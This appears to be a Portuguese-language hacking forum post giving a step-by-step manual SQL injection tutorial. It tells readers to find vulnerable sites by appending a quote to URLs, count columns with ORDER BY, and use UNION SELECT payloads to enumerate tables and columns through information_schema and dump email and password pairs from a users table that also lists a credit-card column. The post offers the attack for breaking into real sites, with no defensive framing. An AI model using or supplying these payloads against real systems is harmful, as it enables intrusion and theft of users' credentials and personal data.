Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.

Como está realizando invasão SQL manualmente (SQL Injection Manual)


Dark Army
 Compartilhar

Posts Recomendados

1. Procure um site com vulnerabilidade SQL, já fiz um post de como está achando.
Coloque um ' no final da URL do site, caso apareça algum erro, é vulnerável :)
Exemplo:
cats88.jpg.681e9de718d185fdafef7c95b35dfd2e.jpg

 

2. Agora no final da URL, retire o ' e coloque order by 1 
Se o site carregar normalmente sem erro, coloque order by 1,2
E assim por diante, até aparecer o erro novamente.
No caso, o erro apareceu em order by 1,2,3,4. Então o site possui somente 3 colunas.

 

3. Agora vamos unir as colunas, apague tudo da URL, e coloque: union all select *números de colunas*, exemplo: union all select 1,2,3-- e coloque - depois do =, exemplo:

É necessário se cadastrar para acessar o conteúdo.
union all select 1,2,3--

 

Agora vamos listar as tabelas:

É necessário se cadastrar para acessar o conteúdo.
union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema =database()--

 

E pronto, já apareceu as tabelas, que no caso são:
artists,carts,categ,featured,guestbook,pictures,products,users

 

4. Gostaria de saber as informações da tabela "users" somente, então vamos realizar esse comando:
union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--

 

Exemplo:

É necessário se cadastrar para acessar o conteúdo.
union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--

 

Resultado: uname,pass,cc,address,email,name,phone,cart

 

5. Vamos pegar finalmente, as informações, com o seguinte comando:
union all select 1,concat(email,0x3a,pass),3 from users--

 

*OBS: O 0x3a, é :, que vai separar o email:pass.*

 

Exemplo:

É necessário se cadastrar para acessar o conteúdo.
union all select 1,concat(uname,0x3a,email,0x3a,pass),3 from users--

 

Resultado: test:[email protected]:test

 

E pronto, foi realizada a invasão manualmente.

Editado por Dark Army

 ♚ KING RETURN ♚

 

Link para o comentário
Compartilhar em outros sites

Participe da Conversa

Você pode postar agora e se cadastrar mais tarde. Cadastre-se Agora para publicar com Sua Conta.
Observação: sua postagem exigirá aprovação do moderador antes de ficar visível.

Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Responder

×   Você colou conteúdo com formatação.   Remover formatação

  Apenas 75 emoticons são permitidos.

×   Seu link foi incorporado automaticamente.   Exibir como um link em vez disso

×   Seu conteúdo anterior foi restaurado.   Limpar Editor

×   Você não pode colar imagens diretamente. Carregar ou inserir imagens do URL.

 Compartilhar

×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.